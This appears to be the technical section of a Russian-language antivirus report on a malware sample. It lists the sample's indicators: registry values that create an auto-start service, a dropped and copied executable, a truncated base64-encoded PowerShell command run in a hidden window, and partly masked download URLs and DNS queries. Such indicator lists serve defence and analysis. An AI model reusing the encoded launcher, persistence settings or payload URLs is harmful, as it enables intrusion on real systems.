Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\acppage] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\acppage] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDBU\acppage.exe"'
- 'acppage' "%WINDIR%\SysWOW64\KBDBU\acppage.exe"
- 'acppage' %WINDIR%\SysWOW64\KBDBU\acppage.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGEAaQB0AGsAdQB0AGgAZQBlAGYAPQAnAGgAdQBhAGwAdABhAHMAdABoAGkAYQBsACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBpAGAAVAB5AGAAcABgAFIAbwB0AG...
- %HOMEPATH%\81.exe
- %WINDIR%\syswow64\kbdbu\acppage.exe
- %HOMEPATH%\81.exe в %WINDIR%\syswow64\kbdbu\acppage.exe
- '20#.#35.10.215':80
- http://xe#a.cz/MqjiWrT/
- http://ze###oser.com/wp-admin/LonYwsGW/
- http://ze###oser.com/cgi-sys/suspendedpage.cgi
- http://si##q.com/glpi/slliHcwAH/
- http://20#.#35.10.215/lQ6sBa/Zohdhp7ZTNPWxQY/8lxoeIvee1ywBXm/
- DNS ASK xe#a.cz
- DNS ASK ze###oser.com
- DNS ASK si##q.com
- '%HOMEPATH%\81.exe'
- '%WINDIR%\syswow64\kbdbu\acppage.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGEAaQB0AGsAdQB0AGgAZQBlAGYAPQAnAGgAdQBhAGwAdABhAHMAdABoAGkAYQBsACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBpAGAAVAB5AGAAcABgAFIAbwB0AG...' (со скрытым окном)